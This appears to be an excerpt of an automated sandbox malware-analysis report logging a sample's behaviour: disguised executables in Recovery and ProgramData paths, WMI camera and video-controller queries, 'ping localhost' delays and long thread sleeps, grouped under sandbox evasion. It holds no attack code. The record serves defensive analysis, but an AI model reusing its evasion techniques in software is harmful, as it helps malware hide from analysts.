                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeMemory allocated: 2A20000 memory reserve | memory write watchJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeMemory allocated: 1AC60000 memory reserve | memory write watchJump to behavior
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeMemory allocated: BC0000 memory reserve | memory write watch
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeMemory allocated: 1A820000 memory reserve | memory write watch
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeMemory allocated: 1320000 memory reserve | memory write watch
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeMemory allocated: 1B1D0000 memory reserve | memory write watch
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeMemory allocated: 3190000 memory reserve | memory write watch
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeMemory allocated: 1B340000 memory reserve | memory write watch
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeMemory allocated: 16F0000 memory reserve | memory write watch
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeMemory allocated: 1B1C0000 memory reserve | memory write watch
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeMemory allocated: 1780000 memory reserve | memory write watch
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeMemory allocated: 1B660000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeMemory allocated: 17E0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeMemory allocated: 1B410000 memory reserve | memory write watch
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeMemory allocated: 2F70000 memory reserve | memory write watch
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeMemory allocated: 1B1B0000 memory reserve | memory write watch
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeMemory allocated: D40000 memory reserve | memory write watch
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeMemory allocated: 1AC50000 memory reserve | memory write watch
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeMemory allocated: 1780000 memory reserve | memory write watch
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeMemory allocated: 1B430000 memory reserve | memory write watch
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeMemory allocated: 2790000 memory reserve | memory write watch
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeMemory allocated: 1AB30000 memory reserve | memory write watch
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeMemory allocated: E80000 memory reserve | memory write watch
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeMemory allocated: 1A9B0000 memory reserve | memory write watch
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeMemory allocated: 930000 memory reserve | memory write watch
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeMemory allocated: 1A740000 memory reserve | memory write watch
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeCode function: 32_2_00007FFD9BB1FD11 sldt word ptr [eax]32_2_00007FFD9BB1FD11
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 600000
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 599830
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 599703
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 599593
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 599417
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 599129
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 599000
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 3600000
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 598844
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 598645
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 598437
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 598172
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 598061
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 597906
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 597760
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 596953
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 596719
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 596578
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 596250
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 596109
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 595999
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 595781
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 595652
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 595539
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 595406
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 595296
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 595149
